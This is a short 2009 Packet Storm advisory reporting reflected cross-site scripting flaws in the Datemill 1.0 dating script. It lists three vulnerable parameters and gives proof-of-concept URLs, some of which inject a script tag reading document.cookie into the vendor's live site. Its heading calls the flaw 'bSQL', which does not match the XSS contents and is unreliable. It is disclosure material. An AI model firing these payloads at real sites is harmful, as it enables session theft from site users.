Datemill 1.0 Cross Site Scripting

2009-09-10T00:00:00
ID PACKETSTORM:81147
Type packetstorm
Reporter Moudi
Modified 2009-09-10T00:00:00

Description

                                        
                                            `/*  
  
_____ _ ___ __   
| ____|_ _(_) \ \ / /_ _ _ _   
| _| \ \ / / | |\ \ /\ / / _` | | | |  
| |___ \ V /| | | \ V V / (_| | |_| |  
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |  
|___/   
_____   
|_ _|__ __ _ _ __ ___   
| |/ _ \/ _` | '_ ` _ \   
| | __/ (_| | | | | | |  
|_|\___|\__,_|_| |_| |_|  
  
Datemill 1.0 Remote XSS Vulnerabilities  
  
Discovered By : Moudi  
Contact : <m0udi@9.cn>  
Download : http://www.datemill.com/  
  
Greetings : Mizoz, Zuka, str0ke, 599eme Man.  
Please visit: http://unkn0wn.ws/board/index.php  
  
*/  
  
[+] Exploit bSQL:  
  
- Vulnerable code in photo_search.php (st)  
- Vulnerable code in photo_view.php (return)  
- Vulnerable code in search.php (st)  
  
- Poc:  
http://127.0.0.1/photo_search.php?st=[XSS]  
http://127.0.0.1/photo_view.php?photo_id=13&return=[XSS]  
http://127.0.0.1/search.php?st=[XSS]  
  
http://www.datemill.com/friendy/photo_search.php?st="><script>alert(document.cookie);</script>  
http://www.datemill.com/friendy/photo_view.php?photo_id=13&return="><script>alert(document.cookie);</script>  
http://www.datemill.com/friendy/search.php?st="><script>alert(document.cookie);</script>  
`